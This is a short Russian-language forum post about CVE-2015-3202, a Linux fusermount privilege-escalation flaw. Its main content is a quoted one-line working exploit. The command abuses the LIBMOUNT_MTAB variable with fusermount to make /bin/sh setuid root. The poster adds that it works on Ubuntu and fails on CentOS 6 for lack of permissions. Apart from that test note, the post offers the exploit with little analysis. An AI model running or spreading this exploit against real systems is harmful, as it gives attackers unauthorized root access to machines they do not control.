Prev Предыдущее сообщение   Следующее сообщение Next
Старый 21.05.2015, 16:15   #1
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию CVE-2015-3202 Linux fusermount privilege escalation via LIBMOUNT_MTAB env

CVE-2015-3202

Цитата:
@taviso: a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
https://gist.github.com/taviso/ecb70eb12d461dd85cba

Запустил по разу - на юбунте работает, на сентоси 6 нет прав на запуск.

Код:
$ ll /bin/fusermount
-rwsr-x--- 1 root fuse 29196 Dec  7  2011 /bin/fusermount*
SynQ вне форума   Ответить с цитированием
 

Метки
linux, privilege escalation

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot